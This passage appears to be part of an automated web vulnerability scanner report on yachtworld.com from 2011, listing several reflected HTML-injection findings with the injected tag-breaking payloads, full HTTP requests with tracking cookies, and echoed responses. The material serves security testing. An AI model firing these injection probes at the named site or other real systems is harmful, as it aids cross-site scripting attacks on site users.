%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:59:53 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a class="navFirst" href="/boats/Power/Cuddy+Cabin/1c1827"><a>25a1139d12e/1">
...[SNIP]...

3.183. http://www.yachtworld.com/boats/Power/Express+Cruiser/1 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.yachtworld.com
Path:	/boats/Power/Express+Cruiser/1

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d18dd"><a>470fd712cec was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /boats/Power/Express+Cruiser/1d18dd"><a>470fd712cec HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:58:36 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a class="navFirst" href="/boats/Power/Express+Cruiser/1d18dd"><a>470fd712cec/1">
...[SNIP]...

3.184. http://www.yachtworld.com/boats/Power/Flybridge/1 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.yachtworld.com
Path:	/boats/Power/Flybridge/1

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 353a8"><a>6c329979d18 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /boats/Power/Flybridge/1353a8"><a>6c329979d18 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:58:36 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a class="navFirst" href="/boats/Power/Flybridge/1353a8"><a>6c329979d18/1">
...[SNIP]...

3.185. http://www.yachtworld.com/boats/Power/Motor+Yacht/1 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.yachtworld.com
Path:	/boats/Power/Motor+Yacht/1

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d799"><a>9836dc30568 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /boats/Power/Motor+Yacht/11d799"><a>9836dc30568 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:58:18 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a class="navFirst" href="/boats/Power/Motor+Yacht/11d799"><a>9836dc30568/1">
...[SNIP]...

3.186. http://www.yachtworld.com/boats/Power/Other/1 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.yachtworld.com
Path:	/boats/Power/Other/1

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd2c7"><a>f35a277fa21 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /boats/Power/Other/1cd2c7"><a>f35a277fa21 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:59:48 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a class="navFirst" href="/boats/Power/Other/1cd2c7"><a>f35a277fa21/1">
...[SNIP]...

3.187. http://www.yachtworld.com/boats/Power/Saltwater+Fishing/1 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.yachtworld.com
Path:	/boats/Power/Saltwater+Fishing/1

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f955"><a>032e4aebb66 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /boats/Power/Saltwater+Fishing/13f955"><a>032e4aebb66 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%